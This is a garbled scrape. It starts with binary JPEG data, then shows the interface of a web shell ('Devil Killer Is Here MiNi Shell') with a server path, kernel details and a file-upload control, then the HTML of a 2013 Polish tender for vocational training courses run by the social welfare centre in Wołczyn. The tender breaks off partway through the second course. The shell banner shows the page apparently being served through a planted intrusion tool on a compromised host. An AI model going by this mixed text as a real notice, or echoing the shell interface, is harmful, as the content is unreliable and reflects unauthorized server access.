JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130617/114537-N-2013.html

<p class="kh_header"><b>Wołczyn: ORGANIZACJA I PRZEPROWADZENIE SZKOLEŃ/KURSÓW W RAMACH PROJEKTU
Wzrost kompetencji życiowych i umiejętności zawodowych klientów
Ośrodka Pomocy Społecznej w Wołczynie</b><br>
<b>Numer ogłoszenia: 114537 - 2013; data zamieszczenia: 17.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Wołczynie , ul. K. Miarki 12, 46-250 Wołczyn, woj. opolskie, tel. 77 418 89 80, faks 77 418 89 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wolczyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA I PRZEPROWADZENIE SZKOLEŃ/KURSÓW W RAMACH PROJEKTU
Wzrost kompetencji życiowych i umiejętności zawodowych klientów
Ośrodka Pomocy Społecznej w Wołczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń/kursów dla 19 uczestników projektu pn. Wzrost kompetencji życiowych i umiejętności zawodowych klientów Ośrodka Pomocy Społecznej w Wołczynie w różnych zakresach tematycznych. Są to osoby bezrobotne i nieaktywne zawodowo, będące w wieku aktywności zawodowej, korzystające z pomocy Ośrodka Pomocy Społecznej w Wołczynie. Wśród uczestników 2 osoby mają orzeczony stopień niepełnosprawności. Każdy temat szkoleń/kursów stanowi odrębną część zamówienia. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik do SIWZ - szczegółowy opis przedmiotu zamówienia.

Przedmiot zamówienia zakwalifikowano do CPV: 
80.50.00.00 - 9 - Usługi szkoleniowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca posiada aktualny wpis do Ewidencji Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy. 
W celu wykazania spełnienie warunku, Wykonawca przedłoży aktualny wpis do Ewidencji Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy.
Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie spełniony, jeżeli Wykonawca wykaże:
Że wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej 2 usługi szkoleniowe w zakresie, którego dotyczy składana oferta (szczegóły poniżej) z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 

Dla części I
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu: Sprzedawca z obsługą kasy fiskalnej. 

Dla części II
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu:  Kurs obsługi komputera. 

Dla części III
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu: Operator koparko - ładowarki.

Dla części IV
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu:  Prawo jazdy kat. B.

Dla części V
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu:  Prawo jazdy kat. C.

Dla części VI
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu robót wykończeniowych 
w budownictwie.

Dla części VII
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu: Podstawowy język niemiecki.

Dla części VIII
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu:  Kucharz małej gastronomii.

Dla części IX
Wykonawca musi wykazać minimum 2 należycie wykonane szkolenia/kursy z zakresu:  Magazynier z obsługą wózków jezdniowych.




W celu wykazania spełnienia w/w warunku Wykonawca przedkłada wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;- załącznik nr 5 - Doświadczenie zawodowe
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca dysponuje następującym potencjałem technicznym (odpowiedni potencjał dla odpowiedniej części, na która zostanie złożona oferta);
Dla części I zamówienia: 
1.	      co najmniej 3 kasami fiskalnymi zróżnicowanymi pod względem konstrukcyjnym i producenta

Dla części II zamówienia:
2.	     stanowiskami przystosowanymi do zajęć praktycznych w proporcji: 1 stanowisko dla 1 uczestnika, stanowiska wyposażone w zestaw komputerowy.

Dla części III zamówienia:
3.	    co najmniej jedną koparko-ładowarką.

Dla części IV i V zamówienia:
4.	     co najmniej jednym samochodem do praktycznej nauki jazdy.

Dla części IX zamówienia:
5.	    co najmniej jednym wózkiem jezdniowym.


W celu wykazania spełnienia w/w warunku Wykonawca przedkłada wykaz narzędzi, wyposażenia zakładu 
i urządzeń technicznych dostępny wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami- załącznik nr 6 - Wykaz sprzętu (odpowiedni wykaz, dla odpowiedniej części, dla której wykonawca składa ofertę).
Wykonawca składa dla każdej z części odrębny wykaz.
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia. 
Wykonawca musi wykazać, że dla części do której składa ofertę, dysponuje co najmniej 1 osobą, która posiada wiedzę teoretyczną i praktyczną w zakresie, którego dotyczy szkolenie/kurs i wykonał należycie bynajmniej jedną usługę szkolenia z tego zakresu. 

W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego załącznik nr 7 do niniejszej SIWZ.
     Wykonawca składa dla każdej z części odrębny wykaz. 
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na  podstawie oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/.
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oświadczenia o braku podstaw do wykluczenia; 
b)	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; 
c)	Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w rozdz. 7 pkt 1 a).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień warunków umowy może nastąpić w przypadku zaistnienia okoliczności określonych w §3 ust. 2 pkt 11 i § 6 ust. 3. Zmiany mogą również dotyczyć:
- terminu wykonania usług w przypadku wystąpienia okoliczności nieprzewidywalnych w dniu udzielenia zamówienia oraz w przypadku zmiany terminu wykonania usług przez instytucję pośredniczącą, 
- zmiany wynagrodzenia w przypadku zmiany przepisów o podatkach, 
- zmiany osób występujących po stronie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych z tym że osoby występujące po stronie Wykonawcy muszą spełniać warunki udziału w postępowaniu, 
- sposobu fakturowania usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wolczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Wołczynie
Wołczyn
ul. K. Miarki 12, 46-250 Wołczyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej w Wołczynie
Wołczyn
ul. K. Miarki 12, 46-250 Wołczyn
w pokoju nr 13..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Wzrost kompetencji życiowych i umiejętności zawodowych klientów Ośrodka Pomocy Społecznej w Wołczynie  realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki
Priorytet VII. Promocja integracji społecznej
Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji 
Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej	
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Fundusz Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest przygotowanie do pracy na stanowisku sprzedawcy wraz z obsługą kasy fiskalnej.
 
Przewidywana liczba osób: 6

Ilość godzin - 48h

Program szkolenia/kursu:
1)	organizowanie i planowanie działalności punktu sprzedaży z uwzględnieniem analizy wyników sprzedaży
2)	przestrzeganie przepisów bezpieczeństwa i higieny pracy, ergonomii, ochrony przeciwpożarowej 
i ochrony środowiska
3)	zapewnienie i przestrzeganie warunków sanitarnych sprzedaży
4)	pozyskiwanie klientów w ramach sprzedaży drobnodetalicznej (kioski, targowiska), detalicznej (sklepy, hipermarkety), hurtowej (hurtownie)
5)	przyjmowanie dostaw towarów
6)	przygotowywanie produktów do sprzedaży i ich wyeksponowanie 
7)	obsługa nabywcy sprzedawanych towarów w handlu detalicznym i hurtowym 
8)	zawieranie transakcji sprzedaży oraz przyjmowanie i wypełnianie dokumentów z nią związanych
9)	rozliczanie i zabezpieczanie utargu oraz punktu sprzedaży lub hurtowni przed włamaniem, kradzieżą itp.
10)	przyjmowanie i rozpatrywanie reklamacji
11)	przygotowanie ofert sprzedaży (oferty towarowe, cenniki, katalogi itp.)
12)	dbanie o wizerunek punktu sprzedaży oraz jakość obsługi klienta
13)	sprawdzanie towarów przeznaczonych do sprzedaży pod względem jakościowym i ilościowym
14)	inwentaryzacja, remanent
15)	budowa kasy fiskalnej, rodzaje kas
16)	uruchamianie i włączanie kas fiskalnych
17)	tworzenie formatu paragonu
18)	wykonywanie operacji raportów
19)	praca z czytnikiem kodów kreskowych, metkownice
20)	anulowanie dowolnej pozycji na paragonie
21)	anulowanie całego paragonu
22)	obsługa wag elektronicznych
23)	programowanie kas 
24)	sprzedaż towarów na kasach
25)	drukowanie raportów na kasach
26)	wystawianie faktur i rachunków
27)	obsługa terminali płatniczych

Wykaz niezbędnych środków i materiałów dydaktycznych:
a)	skrypt zawierający najważniejsze informacje omawiane na szkoleniu/kursie. Wykonawca przekaże Zamawiającemu skrypt najpóźniej na 2 dni przed rozpoczęciem szkolenia/kursu. Zamawiający dokona na swój koszt powielenia skryptu odpowiednio do liczby Uczestników szkolenia/kursu
b)	kasy fiskalne (min. 3 rodzaje)  niezbędne do zrealizowania zadań określonych w programie szkolenia/kursu w części praktycznej

Miejsce realizacji szkolenia/kursu: Wołczyn

Wymagany termin realizacji szkolenia/kursu: lipiec 2013. 

Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu. Wykonawca przeprowadza egzamin wewnętrzny, wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminu).

Zamawiający zapewnia salę szkoleniową, ubezpieczenie NNW, wyżywienie w trakcie zajęć oraz ewentualny dowóz Uczestników na szkolenie/kurs..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs obsługi komputera i Internetu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest nabycie podstawowej wiedzy i umiejętności do obsługi komputera i Internetu.

Przewidywana liczba osób: 3

Ilość godzin: 60h

Program szkolenia/kursu:
1.	Poznanie podstawowych zasad działania i budowy komputera 
a)	budowa komputera - komponenty wewnętrzne
b)	budowa komputera - komponenty zewnętrzne 
c)	urządzenia wejściowe - budowa i podstawowe działanie
d)	urządzenia wyjściowe - budowa i podstawowe działanie 
2.	Podstawy obsługi systemu operacyjnego Windows 
a)	Interface systemu operacyjnego - budowa, zastosowanie, działanie 
b)	zasady działania i podstawowe operacje na plikach i katalogach
c)	korzystanie z pulpitu, ikon, itp. 
d)	wyszukiwanie plików, katalogów, itp. w komputerze
e)	notatnik, przeglądarka obrazów, Windows Media player - podstawowe działanie
f)	konfiguracja systemu z poziomu panelu sterowania
g)	instalacja oprogramowania
h)	korzystanie z zewnętrznych nośników danych - płyt CD/DVD, pendrive oraz innych nośników typu Flash, dyskietki
3.	Obsługa edytora tekstów MS WORD 
a)	tworzenie i formatowanie tekstu
b)	operacje na dokumencie
c)	wklejanie obrazów
d)	tworzenie i formatowanie tabeli,
e)	zarządzanie wydrukami
f)	sprawdzanie pisowni i gramatyki
4.	Obsługa arkusza kalkulacyjnego MS Excel
a)	tworzenie tabel z danymi
b)	zaawansowane wprowadzanie danych
c)	tworzenie i edycja formuł
d)	tworzenie i edycja wykresów danych
e)	tworzenie dokumentów korespondencji seryjnej
5.	Obsługa Internetu i poczty elektronicznej 
a)	zagadnienia dotyczące Internetu i poczty elektronicznej
b)	wyszukiwanie informacji w Internecie - zwykłe i zaawansowane
c)	założenie konta E-mail
d)	obsługa skrzynki pocztowej poprzez WWW
e)	obsługa skrzynki pocztowej poprzez program pocztowy (Outlook Express)

Wykaz niezbędnych środków i materiałów dydaktycznych:
a)	skrypt zawierający najważniejsze informacje omawiane na szkoleniu/kursie. Wykonawca przekaże Zamawiającemu skrypt najpóźniej na 2 dni przed rozpoczęciem szkolenia/kursu. Zamawiający dokona na swój koszt powielenia skryptu odpowiednio do liczby Uczestników szkolenia/kursu.
b)	komputer dla każdego uczestnika szkolenia/kursu wraz z oprogramowaniem 

Miejsce realizacji szkolenia/kursu: Wołczyn

